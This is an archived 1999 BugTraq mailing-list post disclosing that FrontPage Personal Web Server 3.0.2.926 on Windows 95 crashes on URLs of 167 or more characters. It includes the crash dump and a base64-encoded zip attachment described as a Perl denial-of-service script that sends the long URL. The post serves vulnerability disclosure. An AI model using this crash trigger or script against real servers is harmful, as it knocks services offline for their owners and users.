Crash FrontPage Remotely...

From: Narr0w (Narr0wat_private)
Date: Sat Aug 07 1999 - 05:03:32 PDT

Next message: Signal 11: "Re: Cisco 675 password nonsense"

Previous message: David Wagner: "Re: Linux blind TCP spoofing, act II + others"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is a multi-part message in MIME format.

------=_NextPart_000_01BEE0E6.03BD7380
Content-Type: text/plain; charset=KOI8-R
Content-Transfer-Encoding: 7bit

Hello BugTraq friends,
Sorry if it was already in bugtraq, but:

FrontPage PWD32/3.0.2.926 for Win'XX crashes when the url is 167+ long.
I tested it only on: Windows'95 FrontPage Server Extensions Version:
3.0.2.926 Version: FrontPage-PWS32/3.0.2.926.

Here is the error message:

VHTTPD32 caused an invalid page fault in
module VHTTPD32.EXE at 0137:0040aaed.
Registers:
EAX=010d7740 CS=0137 EIP=0040aaed EFLGS=00010202
EBX=00000000 SS=013f ESP=010d53d0 EBP=010d0074
ECX=010d7740 DS=013f ESI=010d7740 FS=13c7
EDX=000000a8 ES=013f EDI=bff92ac1 GS=0000
Bytes at CS:EIP:
ff 75 10 56 68 94 01 00 00 eb 1c 68 00 24 40 00
Stack dump:
00000010 010d7740 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000
00000000

I attached an perl script that connects to the host & sends 167 long url.

Narr0w
------=_NextPart_000_01BEE0E6.03BD7380
Content-Type: application/octet-stream; name="DoS.zip"
Content-Transfer-Encoding: base64
Content-Description: DoS (ZIP File)
Content-Disposition: attachment; filename="DoS.zip"

UEsDBBQAAgAIAI12ByfIEdUUIwIAANwDAAAGAAAARG9TLnBsnVLbbtpAEH1mJf/D1KAWpMQ2hNLW
XAQhQFAosbDTPEAeKJ5iC2sXrZdA2+TfO2suRVWfspIte2bPmXNmJv/O3qTS/h5ze40yMVj+jcfI
szz0peDKmy/x0nv0ryr2leVYFetLpQY3wofrnzCeS+lsLSOXo+v0zo5GDiSi+gVKuOAHncnlozP5
6sN7GOEyFrziOA5dEZv1HgnX8RL6D907AoCKEBbRnHNMIB/NF6uYL6Hd6497gXU8GvRmZ2yTIgzv
XdcXixWqusHiH8V2ZzL4Bg0ol+A3hDGCOeMPKVl3oeBAIxKpas34jJt1eDVYIUHepGepomJBI6fO
U6mueXQGWk2oVc+IelIK6cItkVAHNAoCIWAkyFmGKJGnPTcr6FLQhPaBluStZcwVmF1BPVko3Q5q
U3ZPw5RZZ4U0s0Kwv75cd0gtu2xx3BY9RNkJQwnN1h54oSOekEpHPjsXnhTESd9m0PXMEry87LVP
+53hqHfzpMWdhEwB7u8AsuAx5iMPtbLdhzQTlcna547izEEvANsEC8yduSvXPukvuA0Czy5bzr65
pxoz9b8q3QizfTiUyIqkCeK6+LFE2G0UJ1hsHAq2aAJsEYl1Nhi76lRhLBT0xYaHNuUMljsaOnN5
Cs54EMVptumhwBQ4YbdCrkBw2lHKpCifUdIAdUNLcBghyy0SQQt2EEH/uItV0dH6aHMwSdFg57XP
bBr/gg2mt+2VaYr6H1BLAQIUABQAAgAIAI12ByfIEdUUIwIAANwDAAAGAAAAAAAAAAAAIAAAAAAA
AABEb1MucGxQSwUGAAAAAAEAAQA0AAAARwIAAAAA

------=_NextPart_000_01BEE0E6.03BD7380--

Next message: Signal 11: "Re: Cisco 675 password nonsense"
Previous message: David Wagner: "Re: Linux blind TCP spoofing, act II + others"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:55:47 PDT